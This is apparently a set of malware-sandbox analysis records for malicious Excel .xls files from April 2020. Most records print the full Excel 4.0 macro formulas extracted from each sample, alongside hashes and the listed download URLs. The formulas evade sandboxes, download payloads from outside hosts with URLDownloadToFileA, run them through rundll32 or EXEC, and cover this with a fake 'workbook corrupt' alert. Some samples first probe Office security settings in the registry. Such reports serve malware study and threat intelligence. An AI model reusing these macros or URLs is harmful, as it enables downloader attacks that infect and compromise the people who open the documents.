{"version":"0.2","sample":{"sample":"","kind":"file","target":"89a2a8dfd2ea5607f3afea14b486f730277026d942927716db23460f155c5157"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"89a2a8dfd2ea5607f3afea14b486f730277026d942927716db23460f155c5157","filesize":113664,"md5":"9c3c15d33bdda916b866f18d20189939","sha1":"aa2c37d0d7ba819aae5cde585417a8002a95ccf1","sha256":"89a2a8dfd2ea5607f3afea14b486f730277026d942927716db23460f155c5157","sha512":"c2f96cdddd1c2942d6791291f373eb32ae294880c84394919a5cf1c99d33a7dea31d5267c06977d71015c8bef9baecc7cbc02f9d5cef4bc54779741b188e9e9d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"89a2a8dfd2ea5607f3afea14b486f730277026d942927716db23460f155c5157.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9GuXsPZzLR\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"89a583650dba6abbd3b0756fd9a5714511db483e106426079b5ebfd13b99df99"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"89a583650dba6abbd3b0756fd9a5714511db483e106426079b5ebfd13b99df99","filesize":212992,"md5":"2f3aae35e410425bc7ee7a1d6591727b","sha1":"e66eb3534d11cafcd0ac5d2438ebca8300b82058","sha256":"89a583650dba6abbd3b0756fd9a5714511db483e106426079b5ebfd13b99df99","sha512":"c61787b589dfce4a9f45973a3435b342fa23e391b9ad9c1874012b4bebdd817a23c0c474f44dcc46182719cf93ad893288454133d01aca9b39760fc47e234cbc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"89a583650dba6abbd3b0756fd9a5714511db483e106426079b5ebfd13b99df99.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"T9j0kDlCPU\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"89b1e35664c3b54a5bda50117e492e7d6505d1389d6436d05fc16bad4e591785"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"89b1e35664c3b54a5bda50117e492e7d6505d1389d6436d05fc16bad4e591785","filesize":152576,"md5":"0755876a4f7fec789aae827def7a82a3","sha1":"4bf295569d832027324cf181cdd207ee5528ebd9","sha256":"89b1e35664c3b54a5bda50117e492e7d6505d1389d6436d05fc16bad4e591785","sha512":"70e8c52a0369f3f550097026ca4e1c5c247f102c8b2785f75e046f925e300ecb355c043cc64eea1b09e2f5d521ccb10a2336127aba48b8e4c37eae856fd2b326","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"89b1e35664c3b54a5bda50117e492e7d6505d1389d6436d05fc16bad4e591785.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mezHNPlIma\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"89b8baebcd32a0f07b0a78ece197c5464b94e3c8226c57dd7ca192bbd583ed95"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"89b8baebcd32a0f07b0a78ece197c5464b94e3c8226c57dd7ca192bbd583ed95","filesize":206336,"md5":"d09638506ee173af97622fd56a7098d0","sha1":"41cd958382dbddde2662d22d15b0200eda91e800","sha256":"89b8baebcd32a0f07b0a78ece197c5464b94e3c8226c57dd7ca192bbd583ed95","sha512":"395fea44108afef53345e87a0b92730fe153cf5410d0288c6ca8b1cfc1a47827d5312b6d6f363d38247f1d601484e4a2b0a0a3551dc6491871382b1bf6b66cea","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"89b8baebcd32a0f07b0a78ece197c5464b94e3c8226c57dd7ca192bbd583ed95.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8j3XPOhCHy\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c","filesize":113664,"md5":"c7f273947124d844d77b7c376a9393b4","sha1":"3497bea7fbb12fa3d62fce071fdb22ca53bfbddb","sha256":"89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c","sha512":"b44a5e25276cb98cffa8a5d815d1802e817101cf028216761efb85f65610da2af1741f549fa7738985650dda8727bb7ccc1f36e5ac8baf2fc2ec004bf2c07b0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"89e6e635c1101a6a89d3abbb427551fd9b0c1e9695d22fa44dd480bf6026c44c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"e6oGgi9gZN\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"89f5975b232e3ff20644cc091fb3288d1660be2ef4793b52e78dfcb7c5773ad8"},"analysis":{"reported":"2020-04-09T16:17:31Z","score":10},"files":[{"filename":"89f5975b232e3ff20644cc091fb3288d1660be2ef4793b52e78dfcb7c5773ad8","filesize":113664,"md5":"69125651eb40c2d5ae1a3fd8f70c109a","sha1":"052d55749eb16bfe7ece2ce15b30dd67bd07a49a","sha256":"89f5975b232e3ff20644cc091fb3288d1660be2ef4793b52e78dfcb7c5773ad8","sha512":"f571838a6bace18aa5818ab8f88e63fd6e50fee3bac89f7169a550b1a02b843ebf91159c8710d9a2c62da521793411a80adf710e8fb5b3e1c872c701d6c6cade","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"89f5975b232e3ff20644cc091fb3288d1660be2ef4793b52e78dfcb7c5773ad8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"N19ACjaZHW\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a0dd0c7f5b5911b20211d0bfd4895cb5c601376ecb4007746eb1e5627b09f63"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a0dd0c7f5b5911b20211d0bfd4895cb5c601376ecb4007746eb1e5627b09f63","filesize":144384,"md5":"cf644145d410e073bf410be8121f2f23","sha1":"30c7515967a2d64a8d75dc243fa6c5d98b312aa2","sha256":"8a0dd0c7f5b5911b20211d0bfd4895cb5c601376ecb4007746eb1e5627b09f63","sha512":"5796eb6e3454b263073cbf204940013debd858812c057852b7f711ea72978739a22b4373f93b79033ce32fddd1842adf8446ea1d4faa7e9d85bbe3111e0b366c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a0dd0c7f5b5911b20211d0bfd4895cb5c601376ecb4007746eb1e5627b09f63.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"GC9LufF3sC\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a125c61a84257034c6858e5955e6ce7da343c793ff1d7bc61f061a1303ec006"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a125c61a84257034c6858e5955e6ce7da343c793ff1d7bc61f061a1303ec006","filesize":185344,"md5":"d2c0d4a27c36e2b7a22d3808038a25e7","sha1":"cb24f175c8f875580a9060a1bf95cbd8c7e8ee1d","sha256":"8a125c61a84257034c6858e5955e6ce7da343c793ff1d7bc61f061a1303ec006","sha512":"2462302e919af10100df4d885cef708542c9a324ec3e817619f066a22dbba3984620517d12bc3f237b7af2b2d98c3f14bf2bb0db76dc11f7030ad88d1bbe3940","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a125c61a84257034c6858e5955e6ce7da343c793ff1d7bc61f061a1303ec006.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a186f0be008f9046d88404c34927cae3b868a143ed8b9dfc4a92b020709e9e4"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10,"tags":["macro"]},"signatures":[{"name":"Suspicious Office macro","score":8,"tags":["macro"],"yara_rule":"office_macro_on_action","desc":"Office document macro which triggers in special circumstances - often malicious."}],"files":[{"filename":"8a186f0be008f9046d88404c34927cae3b868a143ed8b9dfc4a92b020709e9e4","filesize":749568,"md5":"03a96e2af60f82c71f07c58c4068f9fb","sha1":"b2dd008c89a82e369efa56d551b43bbe4832d58e","sha256":"8a186f0be008f9046d88404c34927cae3b868a143ed8b9dfc4a92b020709e9e4","sha512":"b5fee64158d89df0f55d4246513792bd1820c95c38eb5badc3ee1bb7deee92d513aa5da872ee45de4c6f5128d06ef7ba13bbc1b05a8714b988437077c7a65adc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a186f0be008f9046d88404c34927cae3b868a143ed8b9dfc4a92b020709e9e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"HYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nHYPERLINK(\"http://a.hiphotos.baidu.com/album/pic/item/29381f30e924b89927f5c2f46e061d950b7bf635.jpg\",\"\")\nLEFT(SUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"# Additionally, comments (such as these) may be inserted on individua\r\n# The IP address and the host name should be separated by at least one\r\n110.75.29.135 s8.taobao.com indivual line. Tdss individual lins\r\n1.93.96.182 s.taobao.com 3c.taobao.com spu.taobao.com list.taobao.com\",\"|\",\"\n\"),\"[{\",),\"}]\",),1)\nSUBSTITUTE(SUBSTITUTE(SUBSTITUTE(\"# Additionally, comments (such as these) may be inserted on individua\r\n# The IP address and the host name should be separated by at least one\r\n110.75.29.135 s8.taobao.com indivual line. Tdss individual lins\r\n1.93.96.182 s.taobao.com 3c.taobao.com spu.taobao.com list.taobao.com\",\"|\",\"\n\"),\"[{\",),\"}]\",)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a240489fd136197c1788d6b581772e6e358695c8ba8278b3346f14d0f8d3a23"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a240489fd136197c1788d6b581772e6e358695c8ba8278b3346f14d0f8d3a23","filesize":144384,"md5":"6167cc882d874251f7c8d4a4b7941406","sha1":"19838ea68b8d4f500138129e95cc4cfdaa8d7ca2","sha256":"8a240489fd136197c1788d6b581772e6e358695c8ba8278b3346f14d0f8d3a23","sha512":"172395c5bdf558d82c2d3ce9eb230b18b1d6dfee1ae27270e4947b3c1a542f572f3da12f3962d425ddb80a5fc9567ffd8d148df5d57fbef4a11b6acfacecfa06","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a240489fd136197c1788d6b581772e6e358695c8ba8278b3346f14d0f8d3a23.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"nrWv1uDNvU\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a35f165c8a42aef65ed8f185fa83babd409113fef8e1f05997ab97dbfad4f80"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a35f165c8a42aef65ed8f185fa83babd409113fef8e1f05997ab97dbfad4f80","filesize":141824,"md5":"d0eee288fc60a0cf3cd872114aed55d0","sha1":"2b6d585b2fc5fb8dc75caf4826ce8d33f3393653","sha256":"8a35f165c8a42aef65ed8f185fa83babd409113fef8e1f05997ab97dbfad4f80","sha512":"dddb2aee03252b077aaac83c4d18d778e88a04658a16dfa68dce2e7c084c8fc800bd1fa4a73234b6eeb21ae24c995b00fecf91e8ad988b5f39df672dfab094e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a35f165c8a42aef65ed8f185fa83babd409113fef8e1f05997ab97dbfad4f80.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"a0Tw27Xmy2\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a4870327dd7afc6ad0aaba00ef2820c166338b343ec0dfb62bc12c85f6920c0"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a4870327dd7afc6ad0aaba00ef2820c166338b343ec0dfb62bc12c85f6920c0","filesize":206336,"md5":"cf1fc7258557e6970209f417a4e8774f","sha1":"0734fdd95a856fbc193ad252e3aba131e28e3f37","sha256":"8a4870327dd7afc6ad0aaba00ef2820c166338b343ec0dfb62bc12c85f6920c0","sha512":"d1cced9ae9aee152b4ab701da3363ee1925e9554cb74484f0fd266a1ec8bca8bda918feab4dc9a39920396442f5cb8d6307f94e2626b8a3db6afddf2d2feb1e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a4870327dd7afc6ad0aaba00ef2820c166338b343ec0dfb62bc12c85f6920c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"qs01pxaXo2\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a4ff01944a61660263ec72747c926c42da930f375ebc9ee82b31f197707a13e"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a4ff01944a61660263ec72747c926c42da930f375ebc9ee82b31f197707a13e","filesize":116224,"md5":"ef04b59a00d0d95d1bf3c6a60fed3f55","sha1":"4b396ba47e2af1623c5af2b82ae5a17083d20ed7","sha256":"8a4ff01944a61660263ec72747c926c42da930f375ebc9ee82b31f197707a13e","sha512":"33a3c79e42ea2a92e50b09dfe95b10789e67d2bdab26bf15cafad72824b5ff4ff3be90da0810bd15e7ec80bad229e46c1ac2a04c0909f248f0a2329726be6499","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a4ff01944a61660263ec72747c926c42da930f375ebc9ee82b31f197707a13e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tiMMiNo7iQ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8a588810cce054cfae9c446ffbbcb6493863f905276c2ae882cf9f1223d9bfe8"},"analysis":{"reported":"2020-04-09T16:17:32Z","score":10},"files":[{"filename":"8a588810cce054cfae9c446ffbbcb6493863f905276c2ae882cf9f1223d9bfe8","filesize":209408,"md5":"caaecde5aa41372a00787f626a27017a","sha1":"b688c6d6d54e15a81e85798429c4fa4891e7f3eb","sha256":"8a588810cce054cfae9c446ffbbcb6493863f905276c2ae882cf9f1223d9bfe8","sha512":"517e7170a5889dfb370d629dbc66cb09d50498ad651dfe9bcd8f4c1a8badba09a397bdec97a4053a7443bb780222aeb58b43f9960e666373df54066b3c79aae5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8a588810cce054cfae9c446ffbbcb6493863f905276c2ae882cf9f1223d9bfe8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AfkLBWT4HG\",TRUE)\nGOTO(R$1C$10)"}}}]}
